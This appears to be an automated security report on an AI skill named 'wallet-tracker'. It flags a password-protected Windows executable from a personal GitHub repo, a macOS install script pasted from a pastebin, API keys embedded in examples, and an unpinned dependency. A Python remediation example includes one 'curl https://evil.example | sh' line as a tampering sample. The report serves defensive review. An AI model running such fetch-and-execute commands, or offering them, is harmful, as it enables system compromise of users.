Trust Assessment
wallet-tracker received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 2 critical, 0 high, 1 medium, and 1 low severity. The critical findings are an untrusted executable download for the Windows prerequisite and an untrusted script execution for the macOS prerequisite; the medium finding is API-key embedding in the example code, and the low finding is an unpinned dependency in the manifest.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 31/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Description | Recommendation | Layer | Location |
|---|---|---|---|---|---|
| CRITICAL | Untrusted executable download for Windows prerequisite | The skill instructs users to download and run an executable (`openclaw-agent.zip`) from a single user's GitHub repository (`hedefbari`). This is a significant supply-chain risk: the archive's integrity cannot be verified and its contents cannot be audited before they run, and running arbitrary executables from unverified sources can lead to system compromise. The requirement to use a password (`openclaw`) to extract the zip is unusual and suspicious; password-protected archives also prevent hosting-side and endpoint malware scanners from inspecting the contents. | Provide a trusted, verified source for the `openclaw-agent` utility, or ideally integrate its functionality directly into the skill or use standard, auditable package managers. If an external binary is absolutely necessary, publish a cryptographic hash (e.g. SHA-256) for verification and host it on a trusted domain. | LLM | SKILL.md:10 |
| CRITICAL | Untrusted script execution for macOS prerequisite | The skill instructs users to copy and paste an installation script from `glot.io`, a public pastebin-like service, into their Terminal. Executing arbitrary scripts from such sources is a severe supply-chain risk: the script's content can change at any time without notice and could contain malicious commands leading to system compromise. | Provide a trusted, verified source for the `openclaw-agent` utility, or ideally integrate its functionality directly into the skill or use standard, auditable package managers. If an external script is absolutely necessary, host it on a trusted domain and publish a cryptographic hash for verification. | LLM | SKILL.md:13 |
| MEDIUM | API key exposure in example code | The examples use placeholders like `YourApiKey`, but they demonstrate a pattern of embedding API keys directly in URLs and source code. If users follow the pattern with real keys, the credentials end up in shell history, logs, proxy records, or version control. | Advise users to supply API keys through environment variables or a secure configuration store rather than embedding them in commands or scripts, and show the pattern in the examples (e.g. `os.environ.get("ETHERSCAN_API_KEY")`). | LLM | SKILL.md:30 |
| LOW | Unpinned dependency in manifest | The `requests` package is specified without a version constraint in the skill's manifest. Builds are therefore non-deterministic, and a new release that introduces breaking changes or a security flaw is picked up automatically. | Pin `requests` to a specific version (e.g. `requests==2.28.1`), ideally together with a `--hash=sha256:...` entry so pip rejects a substituted artifact, or at minimum use a bounded range (e.g. `requests>=2.28.1,<3.0.0`). | LLM | SKILL.md |
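The two remediations the findings ask for, verifying an external artifact against a pinned SHA-256 before executing it and reading the Etherscan API key from the environment instead of the command line, shown together as an added example written for this report; it is not code from the wallet-tracker skill or from SkillShield. The artifact bytes and the pinned hash are constructed for the demo (the hash is computed from the sample so the example runs offline; in a real SKILL.md the pinned value is a literal copied from the publisher's signed checksum file), and the Etherscan endpoint and parameter names are assumed rather than taken from the skill.

```python
"""Hardened forms of the two patterns SkillShield flagged in wallet-tracker.

Added example, not code from the wallet-tracker skill or SkillShield.
SAMPLE_ARTIFACT and its pinned hash are constructed for the demo; the
Etherscan V1 endpoint and parameter names below are an assumption.
"""
import hashlib
import hmac
import os
import re
import urllib.parse

# Constructed stand-in for the bytes of a downloaded installer script.
SAMPLE_ARTIFACT = b"#!/bin/sh\necho 'openclaw-agent installer (demo stand-in)'\n"
# The value that would be pinned in SKILL.md next to the download URL. Here it
# is computed from the sample so the demo runs offline; in a real manifest it is
# a literal copied from the publisher's checksum file, never from the same
# pastebin as the script.
SAMPLE_ARTIFACT_SHA256 = hashlib.sha256(SAMPLE_ARTIFACT).hexdigest()

HEX_SHA256 = re.compile(r"[0-9a-fA-F]{64}")
ETH_ADDRESS = re.compile(r"0x[0-9a-fA-F]{40}")


class ArtifactVerificationError(RuntimeError):
    """Raised when a downloaded artifact does not match its pinned hash."""


def verify_artifact(data: bytes, expected_sha256: str) -> str:
    """Return the hex SHA-256 of data if it equals expected_sha256.

    Call this on the downloaded bytes BEFORE writing them anywhere executable
    or piping them to sh; a mismatch raises ArtifactVerificationError.
    """
    if not HEX_SHA256.fullmatch(expected_sha256):
        raise ArtifactVerificationError("pinned value is not a SHA-256 hex digest")
    actual = hashlib.sha256(data).hexdigest()
    # Constant-time comparison; cheap, and avoids a timing-dependent compare path.
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise ArtifactVerificationError(
            f"artifact hash mismatch: expected {expected_sha256.lower()}, got {actual}"
        )
    return actual


def etherscan_request(address: str, env=None) -> tuple:
    """Build an Etherscan account-balance request with the key read from the environment.

    Returns (url, params). The key is passed as a parameter to the HTTP client
    (e.g. requests.get(url, params=params)), so it never appears in a command
    line, a SKILL.md example, or a URL string you might paste into a log.
    """
    env = os.environ if env is None else env
    key = env.get("ETHERSCAN_API_KEY")
    if not key:
        raise RuntimeError("set ETHERSCAN_API_KEY in the environment, not in the skill")
    if not ETH_ADDRESS.fullmatch(address):
        raise ValueError("address must be a 0x-prefixed 20-byte hex string")
    params = {
        "module": "account",   # assumed Etherscan V1 parameter names
        "action": "balance",
        "address": address,
        "tag": "latest",
        "apikey": key,
    }
    return "https://api.etherscan.io/api", params


def redact_for_log(url: str, params: dict) -> str:
    """Render the request as a log line with the apikey value masked."""
    shown = {k: ("***" if k == "apikey" else v) for k, v in params.items()}
    return f"{url}?{urllib.parse.urlencode(shown)}"


if __name__ == "__main__":
    print("verified:", verify_artifact(SAMPLE_ARTIFACT, SAMPLE_ARTIFACT_SHA256))
    try:
        verify_artifact(SAMPLE_ARTIFACT + b"curl https://evil.example | sh\n",
                        SAMPLE_ARTIFACT_SHA256)
    except ArtifactVerificationError as exc:
        print("rejected tampered copy:", exc)
    demo_env = {"ETHERSCAN_API_KEY": "demo-key-not-real"}  # constructed
    url, params = etherscan_request("0x" + "ab" * 20, env=demo_env)
    print("log line:", redact_for_log(url, params))
```

The same `verify_artifact` check applies to both critical findings: the Windows zip and the macOS script are just bytes fetched over the network, and neither should reach `unzip` or `sh` until the hash matches a value that came from somewhere other than the download itself. For the low finding, the matching change is in the manifest rather than in code: an exact `requests==` pin plus a `--hash=sha256:` entry makes pip perform the equivalent check on the wheel.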
Full report: https://skillshield.io/report/cc605a09dca76cb4 (powered by SkillShield)